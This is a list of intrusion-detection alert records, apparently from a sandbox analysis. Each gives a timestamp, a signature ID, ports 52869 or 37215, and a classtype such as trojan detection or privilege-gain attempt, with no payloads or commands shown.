                      Timestamp:07/20/24-23:05:57.034294
                      SID:2027339
                      Source Port:50598
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.831807
                      SID:2835222
                      Source Port:33816
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.678174
                      SID:2835222
                      Source Port:44694
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.004582
                      SID:2025132
                      Source Port:49712
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:07.860442
                      SID:2025132
                      Source Port:35476
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.912455
                      SID:2027339
                      Source Port:34942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.538013
                      SID:2831300
                      Source Port:36866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.460717
                      SID:2027339
                      Source Port:38038
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.048573
                      SID:2835222
                      Source Port:58526
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.221844
                      SID:2829579
                      Source Port:51310
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.781631
                      SID:2027339
                      Source Port:43394
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:04.461996
                      SID:2025132
                      Source Port:35328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.153509
                      SID:2025132
                      Source Port:45270
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.593709
                      SID:2025132
                      Source Port:39534
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.787162
                      SID:2831300
                      Source Port:45014
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:27.421231
                      SID:2027339
                      Source Port:34190
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.581336
                      SID:2025132
                      Source Port:52466
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.171719
                      SID:2025132
                      Source Port:34548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:15.236295
                      SID:2027339
                      Source Port:58668
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.476247
                      SID:2829579
                      Source Port:60504
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:22.140723
                      SID:2027339
                      Source Port:40768
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:22.925505
                      SID:2025132
                      Source Port:60808
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.079797
                      SID:2829579
                      Source Port:56600
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.204161
                      SID:2027339
                      Source Port:37344
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.328639
                      SID:2835222
                      Source Port:57694
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.014311
                      SID:2835222
                      Source Port:54374
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.546679
                      SID:2831300
                      Source Port:41272
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.202217
                      SID:2027339
                      Source Port:42874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.063033
                      SID:2027339
                      Source Port:38902
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.145339
                      SID:2027339
                      Source Port:36592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.244983
                      SID:2027339
                      Source Port:46034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.939285
                      SID:2025132
                      Source Port:36320
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:07.406980
                      SID:2025132
                      Source Port:36958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.756595
                      SID:2829579
                      Source Port:43482
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.841499
                      SID:2835222
                      Source Port:60538
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.527430
                      SID:2831300
                      Source Port:59440
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:44.951018
                      SID:2025132
                      Source Port:42130
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.972496
                      SID:2027339
                      Source Port:45272
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.662485
                      SID:2835222
                      Source Port:48960
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.130220
                      SID:2025132
                      Source Port:54534
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:15.236295
                      SID:2027339
                      Source Port:49132
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.214918
                      SID:2025132
                      Source Port:32968
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.957923
                      SID:2835222
                      Source Port:52242
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.899974
                      SID:2831300
                      Source Port:38082
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.947824
                      SID:2025132
                      Source Port:57568
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.292228
                      SID:2025132
                      Source Port:43674
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.378138
                      SID:2831300
                      Source Port:40956
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.022949
                      SID:2025132
                      Source Port:48002
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.782996
                      SID:2025132
                      Source Port:42168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.517577
                      SID:2027339
                      Source Port:50690
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.656192
                      SID:2835222
                      Source Port:56002
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.334876
                      SID:2027339
                      Source Port:39240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.006350
                      SID:2027339
                      Source Port:49300
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:31.001861
                      SID:2025132
                      Source Port:60434
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:39.471724
                      SID:2831300
                      Source Port:58438
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.489725
                      SID:2027339
                      Source Port:49076
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.407056
                      SID:2027339
                      Source Port:54092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.386529
                      SID:2829579
                      Source Port:34926
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.824929
                      SID:2027339
                      Source Port:37196
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.933404
                      SID:2025132
                      Source Port:36582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.625646
                      SID:2829579
                      Source Port:39384
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.525433
                      SID:2027339
                      Source Port:36586
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.454514
                      SID:2829579
                      Source Port:37692
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.325897
                      SID:2829579
                      Source Port:38410
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.408178
                      SID:2831300
                      Source Port:50578
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.860838
                      SID:2835222
                      Source Port:57322
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.406047
                      SID:2027339
                      Source Port:56070
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.427717
                      SID:2025132
                      Source Port:59728
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.478181
                      SID:2025132
                      Source Port:56860
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:24.605729
                      SID:2027339
                      Source Port:60630
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.241442
                      SID:2027339
                      Source Port:54434
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.339999
                      SID:2835222
                      Source Port:54780
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.310648
                      SID:2027339
                      Source Port:35356
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.872548
                      SID:2027339
                      Source Port:41124
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.136885
                      SID:2027339
                      Source Port:41146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.489677
                      SID:2027339
                      Source Port:57582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.297548
                      SID:2025132
                      Source Port:53600
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:08.490661
                      SID:2027339
                      Source Port:42062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:34.148721
                      SID:2025132
                      Source Port:38690
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.180899
                      SID:2835222
                      Source Port:39190
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.657262
                      SID:2829579
                      Source Port:38548
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.164358
                      SID:2025132
                      Source Port:53238
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.224583
                      SID:2027339
                      Source Port:56824
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.041200
                      SID:2025132
                      Source Port:43504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.040620
                      SID:2025132
                      Source Port:34364
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.527690
                      SID:2027339
                      Source Port:58296
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.728679
                      SID:2027339
                      Source Port:36602
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.442188
                      SID:2027339
                      Source Port:47550
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.403074
                      SID:2829579
                      Source Port:45610
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.542288
                      SID:2831300
                      Source Port:36592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.109755
                      SID:2831300
                      Source Port:40518
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.208138
                      SID:2025132
                      Source Port:53082
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.659618
                      SID:2835222
                      Source Port:55942
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.047034
                      SID:2027339
                      Source Port:35394
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.555898
                      SID:2835222
                      Source Port:35654
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.797060
                      SID:2025132
                      Source Port:37584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:13.620376
                      SID:2025132
                      Source Port:47274
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.526129
                      SID:2027339
                      Source Port:49968
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.808944
                      SID:2025132
                      Source Port:36558
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.067351
                      SID:2025132
                      Source Port:47736
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:08.628127
                      SID:2025132
                      Source Port:38610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.949221
                      SID:2829579
                      Source Port:36032
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:25.391346
                      SID:2027339
                      Source Port:43672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:07.633025
                      SID:2027339
                      Source Port:56308
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:27.692046
                      SID:2025132
                      Source Port:37414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.464931
                      SID:2027339
                      Source Port:37702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.939890
                      SID:2835222
                      Source Port:59048
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.005197
                      SID:2025132
                      Source Port:57222
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.657123
                      SID:2829579
                      Source Port:36180
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.337765
                      SID:2027339
                      Source Port:59052
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.465127
                      SID:2831300
                      Source Port:43582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.804757
                      SID:2027339
                      Source Port:36984
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.702462
                      SID:2027339
                      Source Port:57510
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.627003
                      SID:2027339
                      Source Port:52150
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.468125
                      SID:2027339
                      Source Port:40514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.461168
                      SID:2831300
                      Source Port:42892
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.622534
                      SID:2835222
                      Source Port:44942
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:03.257276
                      SID:2027339
                      Source Port:35668
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.062143
                      SID:2831300
                      Source Port:39614
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.445004
                      SID:2831300
                      Source Port:56214
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:11.301636
                      SID:2025132
                      Source Port:53752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.134564
                      SID:2835222
                      Source Port:56138
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.557113
                      SID:2027339
                      Source Port:38632
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:25.985417
                      SID:2027339
                      Source Port:45042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.060021
                      SID:2829579
                      Source Port:36954
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.515827
                      SID:2027339
                      Source Port:58830
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.101716
                      SID:2025132
                      Source Port:46150
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.290948
                      SID:2025132
                      Source Port:53408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.478783
                      SID:2025132
                      Source Port:34202
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.951134
                      SID:2829579
                      Source Port:51092
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.501695
                      SID:2027339
                      Source Port:59350
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.301436
                      SID:2027339
                      Source Port:36732
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.915135
                      SID:2025132
                      Source Port:60796
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:08.513489
                      SID:2025132
                      Source Port:41034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.403579
                      SID:2835222
                      Source Port:48232
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:18.744447
                      SID:2027339
                      Source Port:35402
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.364083
                      SID:2027339
                      Source Port:36768
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.507047
                      SID:2027339
                      Source Port:54010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.565771
                      SID:2027339
                      Source Port:40992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.622531
                      SID:2025132
                      Source Port:56504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.143657
                      SID:2829579
                      Source Port:56492
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.159681
                      SID:2025132
                      Source Port:34720
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.412130
                      SID:2829579
                      Source Port:60030
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.185323
                      SID:2831300
                      Source Port:48842
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.127169
                      SID:2835222
                      Source Port:47096
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.675613
                      SID:2027339
                      Source Port:43334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.972369
                      SID:2027339
                      Source Port:43438
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.071790
                      SID:2027339
                      Source Port:60622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.520621
                      SID:2831300
                      Source Port:35144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:31.147829
                      SID:2027339
                      Source Port:48326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.888773
                      SID:2027339
                      Source Port:58656
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:07.493314
                      SID:2831300
                      Source Port:60512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:07.817264
                      SID:2027339
                      Source Port:42196
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.668423
                      SID:2027339
                      Source Port:35588
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.950380
                      SID:2829579
                      Source Port:47188
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.035512
                      SID:2025132
                      Source Port:41158
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.149453
                      SID:2025132
                      Source Port:50560
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:20.736535
                      SID:2027339
                      Source Port:35604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.054227
                      SID:2835222
                      Source Port:45352
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.607400
                      SID:2831300
                      Source Port:33000
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:17.661736
                      SID:2025132
                      Source Port:46228
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.662485
                      SID:2829579
                      Source Port:34146
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.572723
                      SID:2831300
                      Source Port:46950
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.029235
                      SID:2831300
                      Source Port:49954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.566903
                      SID:2025132
                      Source Port:51734
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.439699
                      SID:2831300
                      Source Port:53366
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:44.273031
                      SID:2025132
                      Source Port:42692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.476343
                      SID:2027339
                      Source Port:36368
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.054227
                      SID:2835222
                      Source Port:36942
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.546626
                      SID:2027339
                      Source Port:50716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.333647
                      SID:2027339
                      Source Port:41918
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.577316
                      SID:2835222
                      Source Port:55448
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.460913
                      SID:2027339
                      Source Port:42640
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.421312
                      SID:2829579
                      Source Port:41080
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.447932
                      SID:2027339
                      Source Port:59740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.006350
                      SID:2831300
                      Source Port:49064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.439167
                      SID:2835222
                      Source Port:44886
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.808887
                      SID:2835222
                      Source Port:47828
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.692242
                      SID:2027339
                      Source Port:50158
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.462607
                      SID:2831300
                      Source Port:60736
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.611139
